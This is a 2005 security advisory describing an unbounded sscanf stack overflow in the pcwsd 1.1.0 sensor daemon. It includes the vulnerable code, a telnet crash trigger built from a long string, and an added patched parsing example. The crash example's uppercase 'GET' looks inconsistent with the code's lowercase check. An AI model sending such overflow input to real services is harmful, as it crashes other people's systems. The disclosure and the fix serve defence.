Tripbit Security Advisory
TA-030305 


Severity: High
Application: pcwsd 1.1.0
Platform: Windows
Class: Insufficient Boundary Checking
Release Date: March 03rd, 2005
Vendor: http://home.geggus.net/pcwsd/


• Overview
pcwsd (PC weather sensor daemon) is a TCP daemon and data-logging program that receives data from the environmental radio sensors sold by the German electronics supplier ELV.

• Details
pcwsd-1.1.0/pcwsd.c

[...]
#define MAXLINE 4096
[...]

[...]
char line[MAXLINE];
[...]

[...]
if (strncmp(line,"get",3)==0) {
  getCmd(sockfd,line);
  continue;
}
[...]

[...]
void getCmd(int fd, char* cmdline) {
  int saddr,fault,i;
  char sname[10];
  int args;
  char buf[70];
  char chr;

  [...]
  /* %s has no field width: a sensor name longer than 9 characters
     is written past the end of sname[10] */
  args=sscanf(cmdline, "get %s %1d%c", sname, &saddr, &chr);
  if ((args == 3) && (chr=='\r')) {

    /* check for valid sensor address */
    if ((saddr >=0) && (saddr <8)) {

      /* write requested value */
      for (i=0; i<NUMDATA;i++) {
        if (strcmp(sname,commands[i]) == 0) {
          runSubCommand(fd,i,saddr);
          break;
        }
      }
[...]

Example:

$ telnet 127.0.0.1 4711
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
PCWSD Version 1.1.0 ready
GET /AAAAAAAAAA...

Connection closed by foreign host.
$
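
A bounded version of the parsing step in getCmd(), as an added example that is not part of the advisory or the pcwsd source: the %9s field width keeps sscanf inside the 10-byte sname buffer however long the received line is. The helper name parse_get, its return convention and the sensor name "temp" are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define SNAME_LEN 10   /* same size as sname[] in the excerpt above */

/*
 * Hypothetical helper (not from pcwsd): parse "get <name> <addr>\r".
 * Returns 0 and fills sname/saddr on success, -1 on malformed input.
 */
int parse_get(const char *cmdline, char sname[SNAME_LEN], int *saddr)
{
    char chr = 0;
    int addr = -1;
    int args;

    /* %9s stores at most 9 characters plus the terminating NUL, so the
     * write cannot exceed SNAME_LEN regardless of the length of cmdline. */
    args = sscanf(cmdline, "get %9s %1d%c", sname, &addr, &chr);
    if (args != 3 || chr != '\r')
        return -1;

    /* same sensor address range check as the original code */
    if (addr < 0 || addr >= 8)
        return -1;

    *saddr = addr;
    return 0;
}

int main(void)
{
    char sname[SNAME_LEN];
    char longline[4096];          /* constructed input, MAXLINE-sized */
    int saddr = -1;

    /* constructed over-long sensor name followed by a valid tail */
    memset(longline, 'A', sizeof longline);
    memcpy(longline, "get ", 4);
    strcpy(longline + sizeof longline - 4, " 1\r");

    /* "temp" is a constructed sensor name, not taken from commands[] */
    printf("valid:    %d\n", parse_get("get temp 1\r", sname, &saddr));
    printf("overlong: %d\n", parse_get(longline, sname, &saddr));
    return 0;
}
```

With the width in place an over-long name is truncated at 9 characters, the following %1d conversion fails, and the command is rejected instead of overwriting the stack.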


• Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an 'AS IS' condition. There are 'NO' warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.

• Additional information
This vulnerability has been found and researched by:

posidron posidron@tripbit.org

rushjo rushjo@tripbit.org

• Availability
You can find the latest version of this warning under the following URL:

http://www.tripbit.org/advisories/TA-030305.html